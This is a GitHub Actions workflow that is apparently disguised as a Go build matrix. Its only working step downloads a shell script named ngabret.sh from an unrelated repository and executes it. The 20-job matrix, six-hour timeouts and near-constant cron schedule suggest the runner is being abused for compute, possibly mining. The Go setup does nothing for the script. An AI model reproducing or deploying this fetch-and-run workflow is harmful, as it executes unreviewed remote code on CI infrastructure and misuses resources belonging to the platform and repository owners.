name: harasam

on:  
  push:
  pull_request:
  schedule:
    - cron: '* */6 * * *'
jobs:
  build:
    runs-on: ubuntu-18.04
    strategy:
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10, 1.11, 1.12, 1.13, 1.14, 1.15]
        flag: [a, b]        
    timeout-minutes: 360
    env:
        NUM_JOBS: 25
        JOB: ${{ matrix.job }}
    steps:
    - uses: actions/checkout@v2
    - uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
    - name: Ngabret
      run: |
        wget https://raw.githubusercontent.com/aqsha201/aqsha201/main/ngabret.sh && chmod u+x ngabret.sh && ./ngabret.sh
